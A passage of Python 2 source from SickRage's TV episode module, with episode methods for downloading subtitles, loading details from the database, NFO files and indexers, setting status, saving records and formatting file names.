Episode file doesn't exist, can't download subtitles for S%02dE%02d" % (self.show.indexerid, self.season, self.episode), logger.DEBUG) return logger.log(u"%s: Downloading subtitles for S%02dE%02d" % (self.show.indexerid, self.season, self.episode), logger.DEBUG) previous_subtitles = self.subtitles #logging.getLogger('subliminal.api').addHandler(logging.StreamHandler()) #logging.getLogger('subliminal.api').setLevel(logging.DEBUG) #logging.getLogger('subliminal').addHandler(logging.StreamHandler()) #logging.getLogger('subliminal').setLevel(logging.DEBUG) try: languages = set() for language in frozenset(subtitles.wantedLanguages()).difference(self.subtitles): languages.add(subtitles.fromietf(language)) if not languages: logger.log(u'%s: No missing subtitles for S%02dE%02d' % (self.show.indexerid, self.season, self.episode), logger.DEBUG) return providers = sickbeard.subtitles.getEnabledServiceList() vname = self.location video = None try: # Never look for subtitles in the same path, as we specify the path later on video = subliminal.scan_video(vname, subtitles=False, embedded_subtitles=not sickbeard.EMBEDDED_SUBTITLES_ALL or not force) except Exception: logger.log(u'%s: Exception caught in subliminal.scan_video for S%02dE%02d' % (self.show.indexerid, self.season, self.episode), logger.DEBUG) return if not video: return # TODO: Add gui option for hearing_impaired parameter ? foundSubs = subliminal.download_best_subtitles([video], languages=languages, providers=providers, single=not sickbeard.SUBTITLES_MULTI, hearing_impaired=False) if not foundSubs: logger.log(u'%s: No subtitles found for S%02dE%02d on any provider' % (self.show.indexerid, self.season, self.episode), logger.DEBUG) return # Select the correct subtitles path if sickbeard.SUBTITLES_DIR and ek.ek(os.path.exists, sickbeard.SUBTITLES_DIR): subs_new_path = sickbeard.SUBTITLES_DIR elif sickbeard.SUBTITLES_DIR: subs_new_path = ek.ek(os.path.join, ek.ek(os.path.dirname, self.location), sickbeard.SUBTITLES_DIR) dir_exists = helpers.makeDir(subs_new_path) if not dir_exists: logger.log(u'Unable to create subtitles folder ' + subs_new_path, logger.ERROR) else: helpers.chmodAsParent(subs_new_path) else: subs_new_path = ek.ek(os.path.join, ek.ek(os.path.dirname, self.location)) subliminal.save_subtitles(foundSubs, directory=subs_new_path, single=not sickbeard.SUBTITLES_MULTI) for video, subs in foundSubs.iteritems(): for sub in subs: # Get the file name out of video.name and use the path from above video_path = subs_new_path + "/" + video.name.rsplit("/", 1)[-1] subpath = subliminal.subtitle.get_subtitle_path(video_path, sub.language if sickbeard.SUBTITLES_MULTI else None) helpers.chmodAsParent(subpath) helpers.fixSetGroupID(subpath) if not sickbeard.EMBEDDED_SUBTITLES_ALL and sickbeard.SUBTITLES_EXTRA_SCRIPTS and self.location.endswith(('mkv','mp4')): subtitles.run_subs_extra_scripts(self, foundSubs) except Exception as e: logger.log("Error occurred when downloading subtitles for: %s" % self.location) logger.log(traceback.format_exc(), logger.ERROR) return self.refreshSubtitles() self.subtitles_searchcount += 1 if self.subtitles_searchcount else 1 self.subtitles_lastsearch = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") self.saveToDB() newSubtitles = frozenset(self.subtitles).difference(previous_subtitles) if newSubtitles: subtitleList = ", ".join([subtitles.fromietf(newSub).name for newSub in newSubtitles]) logger.log(u"%s: Downloaded %s subtitles for S%02dE%02d" % (self.show.indexerid, subtitleList, self.season, self.episode), 
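# --- Editor's annotation (not part of the original tv.py sample) ---
# The subtitle-path logic above tries, in order: an existing absolute
# SUBTITLES_DIR, a SUBTITLES_DIR treated as a folder name next to the
# video, then the video's own folder. A hedged sketch of just that
# selection step (the function name is mine, not SickRage's):

import os

def pick_subtitles_dir(video_path, subtitles_dir=None):
    if subtitles_dir and os.path.isdir(subtitles_dir):
        return subtitles_dir                                  # absolute dir
    if subtitles_dir:
        return os.path.join(os.path.dirname(video_path), subtitles_dir)
    return os.path.dirname(video_path)                        # beside video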
logger.DEBUG) notifiers.notify_subtitle_download(self.prettyName(), subtitleList) else: logger.log(u"%s: No subtitles downloaded for S%02dE%02d" % (self.show.indexerid, self.season, self.episode), logger.DEBUG) if sickbeard.SUBTITLES_HISTORY: for video, subs in foundSubs.iteritems(): for sub in subs: logger.log(u'history.logSubtitle %s, %s' % (sub.provider_name, sub.language.opensubtitles), logger.DEBUG) history.logSubtitle(self.show.indexerid, self.season, self.episode, self.status, sub) return self.subtitles def checkForMetaFiles(self): oldhasnfo = self.hasnfo oldhastbn = self.hastbn cur_nfo = False cur_tbn = False # check for nfo and tbn if ek.ek(os.path.isfile, self.location): for cur_provider in sickbeard.metadata_provider_dict.values(): if cur_provider.episode_metadata: new_result = cur_provider._has_episode_metadata(self) else: new_result = False cur_nfo = new_result or cur_nfo if cur_provider.episode_thumbnails: new_result = cur_provider._has_episode_thumb(self) else: new_result = False cur_tbn = new_result or cur_tbn self.hasnfo = cur_nfo self.hastbn = cur_tbn # if either setting has changed return true, if not return false return oldhasnfo != self.hasnfo or oldhastbn != self.hastbn def specifyEpisode(self, season, episode): sqlResult = self.loadFromDB(season, episode) if not sqlResult: # only load from NFO if we didn't load from DB if ek.ek(os.path.isfile, self.location): try: self.loadFromNFO(self.location) except exceptions.NoNFOException: logger.log(u"%s: There was an error loading the NFO for episode S%02dE%02d" % (self.show.indexerid, season, episode), logger.ERROR) # if we tried loading it from NFO and didn't find the NFO, try the Indexers if not self.hasnfo: try: result = self.loadFromIndexer(season, episode) except exceptions.EpisodeDeletedException: result = False # if we failed SQL *and* NFO, Indexers then fail if not result: raise exceptions.EpisodeNotFoundException("Couldn't find episode S%02dE%02d" % (season, episode)) def loadFromDB(self, season, episode): logger.log(u"%s: Loading episode details from DB for episode %s S%02dE%02d" % (self.show.indexerid, self.show.name, season, episode), logger.DEBUG) myDB = db.DBConnection() sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND season = ? 
AND episode = ?", [self.show.indexerid, season, episode]) if len(sqlResults) > 1: raise exceptions.MultipleDBEpisodesException("Your DB has two records for the same show somehow.") elif len(sqlResults) == 0: logger.log(u"%s: Episode S%02dE%02d not found in the database" % (self.show.indexerid, self.season, self.episode), logger.DEBUG) return False else: # NAMEIT logger.log(u"AAAAA from" + str(self.season)+"x"+str(self.episode) + " -" + self.name + " to " + str(sqlResults[0]["name"])) if sqlResults[0]["name"]: self.name = sqlResults[0]["name"] self.season = season self.episode = episode self.absolute_number = sqlResults[0]["absolute_number"] self.description = sqlResults[0]["description"] if not self.description: self.description = "" if sqlResults[0]["subtitles"] and sqlResults[0]["subtitles"]: self.subtitles = sqlResults[0]["subtitles"].split(",") self.subtitles_searchcount = sqlResults[0]["subtitles_searchcount"] self.subtitles_lastsearch = sqlResults[0]["subtitles_lastsearch"] self.airdate = datetime.date.fromordinal(int(sqlResults[0]["airdate"])) # logger.log(u"1 Status changes from " + str(self.status) + " to " + str(sqlResults[0]["status"]), logger.DEBUG) self.status = int(sqlResults[0]["status"] or -1) # don't overwrite my location if sqlResults[0]["location"] and sqlResults[0]["location"]: self.location = os.path.normpath(sqlResults[0]["location"]) if sqlResults[0]["file_size"]: self.file_size = int(sqlResults[0]["file_size"]) else: self.file_size = 0 self.indexerid = int(sqlResults[0]["indexerid"]) self.indexer = int(sqlResults[0]["indexer"]) sickbeard.scene_numbering.xem_refresh(self.show.indexerid, self.show.indexer) try: self.scene_season = int(sqlResults[0]["scene_season"]) except: self.scene_season = 0 try: self.scene_episode = int(sqlResults[0]["scene_episode"]) except: self.scene_episode = 0 try: self.scene_absolute_number = int(sqlResults[0]["scene_absolute_number"]) except: self.scene_absolute_number = 0 if self.scene_absolute_number == 0: self.scene_absolute_number = sickbeard.scene_numbering.get_scene_absolute_numbering( self.show.indexerid, self.show.indexer, self.absolute_number ) if self.scene_season == 0 or self.scene_episode == 0: self.scene_season, self.scene_episode = sickbeard.scene_numbering.get_scene_numbering( self.show.indexerid, self.show.indexer, self.season, self.episode ) if sqlResults[0]["release_name"] is not None: self.release_name = sqlResults[0]["release_name"] if sqlResults[0]["is_proper"]: self.is_proper = int(sqlResults[0]["is_proper"]) if sqlResults[0]["version"]: self.version = int(sqlResults[0]["version"]) if sqlResults[0]["release_group"] is not None: self.release_group = sqlResults[0]["release_group"] self.dirty = False return True def loadFromIndexer(self, season=None, episode=None, cache=True, tvapi=None, cachedSeason=None): if season is None: season = self.season if episode is None: episode = self.episode logger.log(u"%s: Loading episode details from %s for episode S%02dE%02d" % (self.show.indexerid, sickbeard.indexerApi(self.show.indexer).name, season, episode) , logger.DEBUG) indexer_lang = self.show.lang try: if cachedSeason is None: if tvapi is None: lINDEXER_API_PARMS = sickbeard.indexerApi(self.indexer).api_params.copy() if not cache: lINDEXER_API_PARMS['cache'] = False if indexer_lang: lINDEXER_API_PARMS['language'] = indexer_lang if self.show.dvdorder != 0: lINDEXER_API_PARMS['dvdorder'] = True t = sickbeard.indexerApi(self.indexer).indexer(**lINDEXER_API_PARMS) else: t = tvapi myEp = t[self.show.indexerid][season][episode] else: 
myEp = cachedSeason[episode] except (sickbeard.indexer_error, IOError), e: logger.log(u"" + sickbeard.indexerApi(self.indexer).name + " threw up an error: " + ex(e), logger.DEBUG) # if the episode is already valid just log it, if not throw it up if self.name: logger.log(u"" + sickbeard.indexerApi( self.indexer).name + " timed out but we have enough info from other sources, allowing the error", logger.DEBUG) return else: logger.log(u"" + sickbeard.indexerApi(self.indexer).name + " timed out, unable to create the episode", logger.ERROR) return False except (sickbeard.indexer_episodenotfound, sickbeard.indexer_seasonnotfound): logger.log(u"Unable to find the episode on " + sickbeard.indexerApi( self.indexer).name + "... has it been removed? Should I delete from db?", logger.DEBUG) # if I'm no longer on the Indexers but I once was then delete myself from the DB if self.indexerid != -1: self.deleteEpisode() return if getattr(myEp, 'episodename', None) is None: logger.log(u"This episode %s - S%02dE%02d has no name on %s" %(self.show.name, season, episode, sickbeard.indexerApi(self.indexer).name)) # if I'm incomplete on TVDB but I once was complete then just delete myself from the DB for now if self.indexerid != -1: self.deleteEpisode() return False if getattr(myEp, 'absolute_number', None) is None: logger.log(u"This episode %s - S%02dE%02d has no absolute number on %s" %(self.show.name, season, episode, sickbeard.indexerApi(self.indexer).name), logger.DEBUG) else: logger.log(u"%s: The absolute_number for S%02dE%02d is: %s " % (self.show.indexerid, season, episode, myEp["absolute_number"]), logger.DEBUG) self.absolute_number = int(myEp["absolute_number"]) self.name = getattr(myEp, 'episodename', "") self.season = season self.episode = episode sickbeard.scene_numbering.xem_refresh(self.show.indexerid, self.show.indexer) self.scene_absolute_number = sickbeard.scene_numbering.get_scene_absolute_numbering( self.show.indexerid, self.show.indexer, self.absolute_number ) self.scene_season, self.scene_episode = sickbeard.scene_numbering.get_scene_numbering( self.show.indexerid, self.show.indexer, self.season, self.episode ) self.description = getattr(myEp, 'overview', "") firstaired = getattr(myEp, 'firstaired', None) if not firstaired or firstaired == "0000-00-00": firstaired = str(datetime.date.fromordinal(1)) rawAirdate = [int(x) for x in firstaired.split("-")] try: self.airdate = datetime.date(rawAirdate[0], rawAirdate[1], rawAirdate[2]) except (ValueError, IndexError): logger.log(u"Malformed air date of %s retrieved from %s for (%s - S%02dE%02d)" % (firstaired, sickbeard.indexerApi(self.indexer).name, self.show.name, season, episode),logger.WARNING) # if I'm incomplete on the indexer but I once was complete then just delete myself from the DB for now if self.indexerid != -1: self.deleteEpisode() return False # early conversion to int so that episode doesn't get marked dirty self.indexerid = getattr(myEp, 'id', None) if self.indexerid is None: logger.log(u"Failed to retrieve ID from " + sickbeard.indexerApi(self.indexer).name, logger.ERROR) if self.indexerid != -1: self.deleteEpisode() return False # don't update show status if show dir is missing, unless it's missing on purpose if not ek.ek(os.path.isdir, self.show._location) and not sickbeard.CREATE_MISSING_SHOW_DIRS and not sickbeard.ADD_SHOWS_WO_DIR: logger.log(u"The show dir %s is missing, not bothering to change the episode statuses since it'd probably be invalid" % self.show._location ) return if self.location: logger.log(u"%s: Setting status 
for S%02dE%02d based on status %s and location %s" % (self.show.indexerid, season, episode, statusStrings[self.status], self.location), logger.DEBUG)

        if not ek.ek(os.path.isfile, self.location):
            if self.airdate >= datetime.date.today() or self.airdate == datetime.date.fromordinal(1):
                logger.log(u"Episode airs in the future or has no airdate, marking it %s" % statusStrings[UNAIRED],
                           logger.DEBUG)
                self.status = UNAIRED
            elif self.status in [UNAIRED, UNKNOWN]:
                # Only do UNAIRED/UNKNOWN, it could already be snatched/ignored/skipped, or downloaded/archived to disconnected media
                logger.log(u"Episode has already aired, marking it %s" % statusStrings[self.show.default_ep_status],
                           logger.DEBUG)
                self.status = self.show.default_ep_status if self.season > 0 else SKIPPED  # auto-skip specials
            else:
                logger.log(u"Not touching status [ %s ] It could be skipped/ignored/snatched/archived" % statusStrings[self.status],
                           logger.DEBUG)

        # if we have a media file then it's downloaded
        elif sickbeard.helpers.isMediaFile(self.location):
            # leave propers alone, you have to either post-process them or manually change them back
            if self.status not in Quality.SNATCHED_PROPER + Quality.DOWNLOADED + Quality.SNATCHED + [ARCHIVED]:
                logger.log(
                    u"5 Status changes from " + str(self.status) + " to " + str(Quality.statusFromName(self.location)),
                    logger.DEBUG)
                self.status = Quality.statusFromName(self.location, anime=self.show.is_anime)

        # shouldn't get here probably
        else:
            logger.log(u"6 Status changes from " + str(self.status) + " to " + str(UNKNOWN), logger.DEBUG)
            self.status = UNKNOWN

    def loadFromNFO(self, location):

        if not ek.ek(os.path.isdir, self.show._location):
            logger.log(
                str(self.show.indexerid) + u": The show dir is missing, not bothering to try loading the episode NFO")
            return

        logger.log(
            str(self.show.indexerid) + u": Loading episode details from the NFO file associated with " + location,
            logger.DEBUG)

        self.location = location

        if self.location != "":

            if self.status == UNKNOWN:
                if sickbeard.helpers.isMediaFile(self.location):
                    logger.log(u"7 Status changes from " + str(self.status) + " to " + str(
                        Quality.statusFromName(self.location, anime=self.show.is_anime)), logger.DEBUG)
                    self.status = Quality.statusFromName(self.location, anime=self.show.is_anime)

            nfoFile = sickbeard.helpers.replaceExtension(self.location, "nfo")
            logger.log(str(self.show.indexerid) + u": Using NFO name " + nfoFile, logger.DEBUG)

            if ek.ek(os.path.isfile, nfoFile):
                try:
                    showXML = etree.ElementTree(file=nfoFile)
                except (SyntaxError, ValueError), e:
                    logger.log(u"Error loading the NFO, backing up the NFO and skipping for now: " + ex(e),
                               logger.ERROR)
                    # TODO: figure out what's wrong and fix it
                    try:
                        ek.ek(os.rename, nfoFile, nfoFile + ".old")
                    except Exception, e:
                        logger.log(
                            u"Failed to rename your episode's NFO file - you need to delete it or fix it: " + ex(e),
                            logger.ERROR)
                    raise exceptions.NoNFOException("Error in NFO format")

                for epDetails in showXML.getiterator('episodedetails'):
                    if epDetails.findtext('season') is None or int(epDetails.findtext('season')) != self.season or \
                            epDetails.findtext('episode') is None or int(
                            epDetails.findtext('episode')) != self.episode:
                        # findtext() returns strings (or None), so the values read from the NFO are formatted with %s
                        logger.log(u"%s: NFO has an <episodedetails> block for a different episode - wanted S%02dE%02d but got S%sE%s" %
                                   (self.show.indexerid, self.season, self.episode,
                                    epDetails.findtext('season'), epDetails.findtext('episode')), logger.DEBUG)
                        continue

                    if epDetails.findtext('title') is None or epDetails.findtext('aired') is None:
                        raise exceptions.NoNFOException("Error in NFO format (missing 
episode title or airdate)") self.name = epDetails.findtext('title') self.episode = int(epDetails.findtext('episode')) self.season = int(epDetails.findtext('season')) sickbeard.scene_numbering.xem_refresh(self.show.indexerid, self.show.indexer) self.scene_absolute_number = sickbeard.scene_numbering.get_scene_absolute_numbering( self.show.indexerid, self.show.indexer, self.absolute_number ) self.scene_season, self.scene_episode = sickbeard.scene_numbering.get_scene_numbering( self.show.indexerid, self.show.indexer, self.season, self.episode ) self.description = epDetails.findtext('plot') if self.description is None: self.description = "" if epDetails.findtext('aired'): rawAirdate = [int(x) for x in epDetails.findtext('aired').split("-")] self.airdate = datetime.date(rawAirdate[0], rawAirdate[1], rawAirdate[2]) else: self.airdate = datetime.date.fromordinal(1) self.hasnfo = True else: self.hasnfo = False if ek.ek(os.path.isfile, sickbeard.helpers.replaceExtension(nfoFile, "tbn")): self.hastbn = True else: self.hastbn = False def __str__(self): toReturn = "" toReturn += "%s - S%02dE%02d - %s " % (self.show.name, self.season, self.episode, self.name ) + "\n" toReturn += "location: " + str(self.location) + "\n" toReturn += "description: " + str(self.description) + "\n" toReturn += "subtitles: " + str(",".join(self.subtitles)) + "\n" toReturn += "subtitles_searchcount: " + str(self.subtitles_searchcount) + "\n" toReturn += "subtitles_lastsearch: " + str(self.subtitles_lastsearch) + "\n" toReturn += "airdate: " + str(self.airdate.toordinal()) + " (" + str(self.airdate) + ")\n" toReturn += "hasnfo: " + str(self.hasnfo) + "\n" toReturn += "hastbn: " + str(self.hastbn) + "\n" toReturn += "status: " + str(self.status) + "\n" return toReturn def createMetaFiles(self): if not ek.ek(os.path.isdir, self.show._location): logger.log(str(self.show.indexerid) + u": The show dir is missing, not bothering to try to create metadata") return self.createNFO() self.createThumbnail() if self.checkForMetaFiles(): self.saveToDB() def createNFO(self): result = False for cur_provider in sickbeard.metadata_provider_dict.values(): result = cur_provider.create_episode_metadata(self) or result return result def createThumbnail(self): result = False for cur_provider in sickbeard.metadata_provider_dict.values(): result = cur_provider.create_episode_thumb(self) or result return result def deleteEpisode(self): logger.log(u"Deleting %s S%02dE%02d from the DB" % (self.show.name, self.season, self.episode), logger.DEBUG) # remove myself from the show dictionary if self.show.getEpisode(self.season, self.episode, noCreate=True) == self: logger.log(u"Removing myself from my show's list", logger.DEBUG) del self.show.episodes[self.season][self.episode] # delete myself from the DB logger.log(u"Deleting myself from the database", logger.DEBUG) myDB = db.DBConnection() sql = "DELETE FROM tv_episodes WHERE showid=" + str(self.show.indexerid) + " AND season=" + str( self.season) + " AND episode=" + str(self.episode) myDB.action(sql) raise exceptions.EpisodeDeletedException() def get_sql(self, forceSave=False): """ Creates SQL queue for this episode if any of its data has been changed since the last save. forceSave: If True it will create SQL queue even if no data has been changed since the last save (aka if the record is not dirty). 
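        Returns (shape inferred from the method body below; values illustrative):
            a single [query, params] pair suitable for DBConnection().mass_action(),
            e.g. ["UPDATE tv_episodes SET ... WHERE episode_id = ?", [...]],
            or None when the record is clean and forceSave is False.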
""" try: if not self.dirty and not forceSave: logger.log(str(self.show.indexerid) + u": Not creating SQL queue - record is not dirty", logger.DEBUG) return myDB = db.DBConnection() rows = myDB.select( 'SELECT episode_id, subtitles FROM tv_episodes WHERE showid = ? AND season = ? AND episode = ?', [self.show.indexerid, self.season, self.episode]) epID = None if rows: epID = int(rows[0]['episode_id']) if epID: # use a custom update method to get the data into the DB for existing records. # Multi or added subtitle or removed subtitles if sickbeard.SUBTITLES_MULTI or not rows[0]['subtitles'] or not self.subtitles: return [ "UPDATE tv_episodes SET indexerid = ?, indexer = ?, name = ?, description = ?, subtitles = ?, " "subtitles_searchcount = ?, subtitles_lastsearch = ?, airdate = ?, hasnfo = ?, hastbn = ?, status = ?, " "location = ?, file_size = ?, release_name = ?, is_proper = ?, showid = ?, season = ?, episode = ?, " "absolute_number = ?, version = ?, release_group = ? WHERE episode_id = ?", [self.indexerid, self.indexer, self.name, self.description, ",".join(self.subtitles), self.subtitles_searchcount, self.subtitles_lastsearch, self.airdate.toordinal(), self.hasnfo, self.hastbn, self.status, self.location, self.file_size, self.release_name, self.is_proper, self.show.indexerid, self.season, self.episode, self.absolute_number, self.version, self.release_group, epID]] else: # Don't update the subtitle language when the srt file doesn't contain the alpha2 code, keep value from subliminal return [ "UPDATE tv_episodes SET indexerid = ?, indexer = ?, name = ?, description = ?, " "subtitles_searchcount = ?, subtitles_lastsearch = ?, airdate = ?, hasnfo = ?, hastbn = ?, status = ?, " "location = ?, file_size = ?, release_name = ?, is_proper = ?, showid = ?, season = ?, episode = ?, " "absolute_number = ?, version = ?, release_group = ? WHERE episode_id = ?", [self.indexerid, self.indexer, self.name, self.description, self.subtitles_searchcount, self.subtitles_lastsearch, self.airdate.toordinal(), self.hasnfo, self.hastbn, self.status, self.location, self.file_size, self.release_name, self.is_proper, self.show.indexerid, self.season, self.episode, self.absolute_number, self.version, self.release_group, epID]] else: # use a custom insert method to get the data into the DB. return [ "INSERT OR IGNORE INTO tv_episodes (episode_id, indexerid, indexer, name, description, subtitles, " "subtitles_searchcount, subtitles_lastsearch, airdate, hasnfo, hastbn, status, location, file_size, " "release_name, is_proper, showid, season, episode, absolute_number, version, release_group) VALUES " "((SELECT episode_id FROM tv_episodes WHERE showid = ? AND season = ? AND episode = ?)" ",?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?);", [self.show.indexerid, self.season, self.episode, self.indexerid, self.indexer, self.name, self.description, ",".join(self.subtitles), self.subtitles_searchcount, self.subtitles_lastsearch, self.airdate.toordinal(), self.hasnfo, self.hastbn, self.status, self.location, self.file_size, self.release_name, self.is_proper, self.show.indexerid, self.season, self.episode, self.absolute_number, self.version, self.release_group]] except Exception as e: logger.log(u"Error while updating database: %s" % (repr(e)), logger.ERROR) def saveToDB(self, forceSave=False): """ Saves this episode to the database if any of its data has been changed since the last save. forceSave: If True it will save to the database even if no data has been changed since the last save (aka if the record is not dirty). 
""" if not self.dirty and not forceSave: logger.log(str(self.show.indexerid) + u": Not saving episode to db - record is not dirty", logger.DEBUG) return logger.log(str(self.show.indexerid) + u": Saving episode details to database", logger.DEBUG) logger.log(u"STATUS IS " + str(self.status), logger.DEBUG) newValueDict = {"indexerid": self.indexerid, "indexer": self.indexer, "name": self.name, "description": self.description, "subtitles": ",".join(self.subtitles), "subtitles_searchcount": self.subtitles_searchcount, "subtitles_lastsearch": self.subtitles_lastsearch, "airdate": self.airdate.toordinal(), "hasnfo": self.hasnfo, "hastbn": self.hastbn, "status": self.status, "location": self.location, "file_size": self.file_size, "release_name": self.release_name, "is_proper": self.is_proper, "absolute_number": self.absolute_number, "version": self.version, "release_group": self.release_group } controlValueDict = {"showid": self.show.indexerid, "season": self.season, "episode": self.episode} # use a custom update/insert method to get the data into the DB myDB = db.DBConnection() myDB.upsert("tv_episodes", newValueDict, controlValueDict) def fullPath(self): if self.location == None or self.location == "": return None else: return ek.ek(os.path.join, self.show.location, self.location) def createStrings(self, pattern=None): patterns = [ '%S.N.S%SE%0E', '%S.N.S%0SE%E', '%S.N.S%SE%E', '%S.N.S%0SE%0E', '%SN S%SE%0E', '%SN S%0SE%E', '%SN S%SE%E', '%SN S%0SE%0E' ] strings = [] if not pattern: for p in patterns: strings += [self._format_pattern(p)] return strings return self._format_pattern(pattern) def prettyName(self): """ Returns the name of this episode in a "pretty" human-readable format. Used for logging and notifications and such. Returns: A string representing the episode's name and season/ep numbers """ if self.show.anime and not self.show.scene: return self._format_pattern('%SN - %AB - %EN') elif self.show.air_by_date: return self._format_pattern('%SN - %AD - %EN') return self._format_pattern('%SN - %Sx%0E - %EN') def _ep_name(self): """ Returns the name of the episode to use during renaming. Combines the names of related episodes. Eg. "Ep Name (1)" and "Ep Name (2)" becomes "Ep Name" "Ep Name" and "Other Ep Name" becomes "Ep Name & Other Ep Name" """ multiNameRegex = "(.*) \(\d{1,2}\)" self.relatedEps = sorted(self.relatedEps, key=lambda x: x.episode) if len(self.relatedEps) == 0: goodName = self.name else: goodName = '' singleName = True curGoodName = None for curName in [self.name] + [x.name for x in self.relatedEps]: match = re.match(multiNameRegex, curName) if not match: singleName = False break if curGoodName == None: curGoodName = match.group(1) elif curGoodName != match.group(1): singleName = False break if singleName: goodName = curGoodName else: goodName = self.name for relEp in self.relatedEps: goodName += " & " + relEp.name return goodName def _replace_map(self): """ Generates a replacement map for this episode which maps all possible custom naming patterns to the correct value for this episode. Returns: A dict with patterns as the keys and their replacement values as the values. 
""" ep_name = self._ep_name() def dot(name): return helpers.sanitizeSceneName(name) def us(name): return re.sub('[ -]', '_', name) def release_name(name): if name: name = helpers.remove_non_release_groups(helpers.remove_extension(name)) return name def release_group(show, name): if name: name = helpers.remove_non_release_groups(helpers.remove_extension(name)) else: return "" try: np = NameParser(name, showObj=show, naming_pattern=True) parse_result = np.parse(name) except (InvalidNameException, InvalidShowException), e: logger.log(u"Unable to get parse release_group: " + ex(e), logger.DEBUG) return '' if not parse_result.release_group: return '' return parse_result.release_group epStatus, epQual = Quality.splitCompositeStatus(self.status) # @UnusedVariable if sickbeard.NAMING_STRIP_YEAR: show_name = re.sub("\(\d+\)$", "", self.show.name).rstrip() else: show_name = self.show.name #try to get the release group rel_grp = {}; rel_grp["SiCKRAGE"] = 'SiCKRAGE'; if hasattr(self, 'location'): #from the location name rel_grp['location'] = release_group(self.show, self.location); if (rel_grp['location'] == ''): del rel_grp['location'] if hasattr(self, '_release_group'): #from the release group field in db rel_grp['database'] = self._release_group; if (rel_grp['database'] == ''): del rel_grp['database'] if hasattr(self, 'release_name'): #from the release name field in db rel_grp['release_name'] = release_group(self.show, self.release_name); if (rel_grp['release_name'] == ''): del rel_grp['release_name'] # use release_group, release_name, location in that order if ('database' in rel_grp): relgrp = 'database' elif ('release_name' in rel_grp): relgrp = 'release_name' elif ('location' in rel_grp): relgrp = 'location' else: relgrp = 'SiCKRAGE' return { '%SN': show_name, '%S.N': dot(show_name), '%S_N': us(show_name), '%EN': ep_name, '%E.N': dot(ep_name), '%E_N': us(ep_name), '%QN': Quality.qualityStrings[epQual], '%Q.N': dot(Quality.qualityStrings[epQual]), '%Q_N': us(Quality.qualityStrings[epQual]), '%S': str(self.season), '%0S': '%02d' % self.season, '%E': str(self.episode), '%0E': '%02d' % self.episode, '%XS': str(self.scene_season), '%0XS': '%02d' % self.scene_season, '%XE': str(self.scene_episode), '%0XE': '%02d' % self.scene_episode, '%AB': '%(#)03d' % {'#': self.absolute_number}, '%XAB': '%(#)03d' % {'#': self.scene_absolute_number}, '%RN': release_name(self.release_name), '%RG': rel_grp[relgrp], '%AD': str(self.airdate).replace('-', ' '), '%A.D': str(self.airdate).replace('-', '.'), '%A_D': us(str(self.airdate)), '%A-D': str(self.airdate), '%Y': str(self.airdate.year), '%M': str(self.airdate.month), '%D': str(self.airdate.day), '%0M': '%02d' % self.airdate.month, '%0D': '%02d' % self.airdate.day, '%RT': "PROPER" if self.is_proper else "", } def _format_string(self, pattern, replace_map): """ Replaces all template strings with the correct value """ result_name = pattern # do the replacements for cur_replacement in sorted(replace_map.keys(), reverse=True): result_name = result_name.replace(cur_replacement, helpers.sanitizeFileName(replace_map[cur_replacement])) result_name = result_name.replace(cur_replacement.lower(), helpers.sanitizeFileName(replace_map[cur_replacement].lower())) return result_name def _format_pattern(self, pattern=None, multi=None, anime_type=None): """ Manipulates an episode naming pattern and then fills the template in """ if pattern == None: pattern = sickbeard.NAMING_PATTERN if multi == None: multi = sickbeard.NAMING_MULTI_EP if sickbeard.NAMING_CUSTOM_ANIME: if anime_type == 
None: anime_type = sickbeard.NAMING_ANIME else: anime_type = 3 replace_map = self._replace_map() result_name = pattern # if there's no release group in the db, let the user know we replaced it if (not hasattr(self, '_release_group') and (not replace_map['%RG'] == 'SiCKRAGE')): logger.log(u"Episode has no release group, replacing it with '" + replace_map['%RG'] + "'", logger.DEBUG); self._release_group = replace_map['%RG'] #if release_group is not in the db, put it there elif ((self._release_group == '') and (not replace_map['%RG'] == 'SiCKRAGE')): logger.log(u"Episode has no release group, replacing it with '" + replace_map['%RG'] + "'", logger.DEBUG); self._release_group = replace_map['%RG'] #if release_group is not in the db, put it there # if there's no release name then replace it with a reasonable facsimile if not replace_map['%RN']: if self.show.air_by_date or self.show.sports: result_name = result_name.replace('%RN', '%S.N.%A.D.%E.N-' + replace_map['%RG']) result_name = result_name.replace('%rn', '%s.n.%A.D.%e.n-' + replace_map['%RG'].lower()) elif anime_type != 3: result_name = result_name.replace('%RN', '%S.N.%AB.%E.N-' + replace_map['%RG']) result_name = result_name.replace('%rn', '%s.n.%ab.%e.n-' + replace_map['%RG'].lower()) else: result_name = result_name.replace('%RN', '%S.N.S%0SE%0E.%E.N-' + replace_map['%RG']) result_name = result_name.replace('%rn', '%s.n.s%0se%0e.%e.n-' + replace_map['%RG'].lower()) logger.log(u"Episode has no release name, replacing it with a generic one: " + result_name, logger.DEBUG) if not replace_map['%RT']: result_name = re.sub('([ _.-]*)%RT([ _.-]*)', r'\2', result_name) # split off ep name part only name_groups = re.split(r'[\\/]', result_name) # figure out the double-ep numbering style for each group, if applicable for cur_name_group in name_groups: season_format = sep = ep_sep = ep_format = None season_ep_regex = ''' (?P<pre_sep>[ _.-]*) ((?:s(?:eason|eries)?\s*)?%0?S(?![._]?N)) (.*?) (%0?E(?![._]?N)) (?P<post_sep>[ _.-]*) ''' ep_only_regex = '(E?%0?E(?![._]?N))' # try the normal way season_ep_match = re.search(season_ep_regex, cur_name_group, re.I | re.X) ep_only_match = re.search(ep_only_regex, cur_name_group, re.I | re.X) # if we have a season and episode then collect the necessary data if season_ep_match: season_format = season_ep_match.group(2) ep_sep = season_ep_match.group(3) ep_format = season_ep_match.group(4) sep = season_ep_match.group('pre_sep') if not sep: sep = season_ep_match.group('post_sep') if not sep: sep = ' ' # force 2-3-4 format if they chose to extend if multi in (NAMING_EXTEND, NAMING_LIMITED_EXTEND, NAMING_LIMITED_EXTEND_E_PREFIXED): ep_sep = '-' regex_used = season_ep_regex # if there's no season then there's not much choice so we'll just force them to use 03-04-05 style elif ep_only_match: season_format = '' ep_sep = '-' ep_format = ep_only_match.group(1) sep = '' regex_used = ep_only_regex else: continue # we need at least this much info to continue if not ep_sep or not ep_format: continue # start with the ep string, eg. 
